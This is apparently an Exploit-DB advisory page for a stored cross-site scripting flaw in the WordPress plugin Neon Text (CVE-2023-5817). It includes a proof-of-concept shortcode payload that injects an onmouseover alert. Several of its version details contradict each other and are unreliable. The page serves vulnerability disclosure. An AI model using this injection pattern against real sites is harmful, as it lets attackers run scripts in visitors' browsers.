header-logo
Suggest Exploit
vendor:
Neon Text
by:
Eren Car
4.1
CVSS
MEDIUM
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Neon Text
Affected Version From: 1.1.2024
Affected Version To: 1.1
Patch Exists: NO
Related CWE: CVE-2023-5817
CPE: a:wordpress:neon_text:1.1
Metasploit:
Other Scripts:
Platforms Tested: Debian / WordPress 6.4.1
2023

WordPress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)

Wordpress Plugin Neon Text version 1.1 and above is prone to a Stored Cross-Site Scripting (XSS) vulnerability through the neontext_box shortcode, allowing attackers to execute malicious scripts.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)
# Date: 2023-11-15
# Exploit Author: Eren Car
# Vendor Homepage: https://www.eralion.com/
# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.4.1
# CVE : CVE-2023-5817

# 1. Description:
The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. 
  
# 2. Proof of Concept (PoC):
  a. Install and activate version 1.0 of the plugin.
  b. Go to the posts page and create new post.
  c. Add shorcode block and insert the following payload:
  
		[neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]
		
		
  d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.